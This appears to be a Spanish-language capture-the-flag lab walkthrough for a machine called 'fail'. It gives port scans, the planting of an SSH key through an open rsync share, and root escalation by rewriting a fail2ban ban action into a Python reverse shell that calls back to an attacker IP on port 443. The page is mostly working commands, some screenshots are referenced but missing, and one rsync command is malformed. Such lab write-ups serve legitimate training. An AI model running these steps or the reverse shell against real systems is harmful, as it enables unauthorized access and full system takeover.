nmap -A -p- -oA fail 192.168.59.126 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA fail 192.168.59.126

nmap -sU -O -p- -oA fail-udp 192.168.59.126

nikto -h 192.168.59.126:80

Pasted image 20210921131037.png

Pasted image 20210921131225.png

![[Pasted image 20210921131225.png]]

nc -nv 192.168.59.126 873

@RSYNCD: 31.0

#list

Nos tratamos de conectar por rsync

Pasted image 20210921131343.png

rsync -av --list-only rsync://192.168.59.126/fox

Pasted image 20210921131627.png

Creamos un llave con ssh-keygen

rsync -av keys/ rsync://rsync://192.168.59.126/fox/.ssh

rsync -av --list-only rsync://192.168.59.126/fox

Pasted image 20210921142125.png

ssh -i id_rsa fox@192.168.59.126

Vemos el fail2ban cuando hacemos un id

Pasted image 20210921142310.png

ps aux | grep root

Pasted image 20210921142447.png

Vemos la lista de procesos que ejecuta root

ls -ali /etc/fail2ban/action.d

Pasted image 20210921142718.png

cd /etc/fail2ban/action.d

ls

vim iptables-multiport.conf

Pasted image 20210921142855.png

actionban = python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.59",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Pasted image 20210921145148.png

nc -lvnp 443

ssh fox@192.168.49.59

Introducimos una contrasena erronea

Pasted image 20210921145203.png

boxes

copyright©2022 Cu3rv0x all rights reserved